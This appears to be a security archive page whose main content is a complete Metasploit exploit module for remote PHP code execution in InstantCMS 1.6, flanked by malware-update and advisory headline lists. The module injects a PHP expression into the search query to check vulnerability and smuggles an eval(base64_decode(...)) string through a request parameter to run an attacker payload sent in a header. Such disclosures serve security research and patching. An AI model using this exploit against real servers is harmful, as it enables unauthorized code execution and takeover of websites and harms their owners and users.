The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
Login As
You can log in if you are registered at one of these services:
Security Bulletins
Latest Malware Updates

Infostealer.Posteal

02/26/2015

Downloader.Busadom

02/26/2015

Trojan.Ladocosm

02/26/2015

SONAR.SuspDocRun

02/25/2015

SONAR.SuspHelpRun

02/25/2015
07/05/2013

InstantCMS 1.6 Remote PHP Code Execution

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'InstantCMS 1.6 Remote PHP Code Execution',
      'Description'    => %q{
        This module exploits an arbitrary php command execution vulnerability, because of a
        dangerous use of eval(), in InstantCMS versions 1.6.
      },
      'Author'         =>
        [
          'AkaStep', # Vulnerability discovery and PoC
          'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '60816' ],
          [ 'URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html'; ]
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch' => ARCH_PHP,
      'Targets'        =>
        [
          [ 'InstantCMS 1.6', { }  ],
        ],
      'DisclosureDate' => 'Jun 26 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view'  => 'search',
        'query' => '${echo phpinfo()}'
      }
    })

    if res
      if res.body.match(/Build Date/)
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Safe
      end
    else
      return Exploit::CheckCode::Unknown
    end

  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    return Exploit::CheckCode::Unknown
  end

  def exploit

    print_status("Executing payload...")

    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view'  => 'search',
        'query' => rand_text_alpha(3 + rand(3)),
        'look'  => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"
      },
      'headers' => {
        'Cmd' => Rex::Text.encode_base64(payload.encoded)
      }
    })

  end
end

Security Advisories Database

Remote Code Execution Vulnerability in Microsoft OpenType Font Driver

A remote attacker can execute arbitrary code on the target system.

07/21/2015

SQL Injection Vulnerability in Piwigo

SQL inection vulnerability has been discovered in Piwigo.

02/05/2015

Cross-site Scripting Vulnerability in DotNetNuke

A cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke.

02/05/2015

Cross-site Scripting Vulnerability in Hitachi Command Suite

A cross-site scripting vulnerability was found in Hitachi Command Suite.

02/02/2015

Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk Handling

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-Forwards

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in MalwareBytes Anti-Exploit &quot;mbae.sys&quot;

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Linux Kernel splice

An attacker can perform a denial of service attack.

01/29/2015

Denial of service vulnerability in Python Pillow Module PNG Text Chunks Decompression

An attacker can perform a denial of service attack.

01/20/2015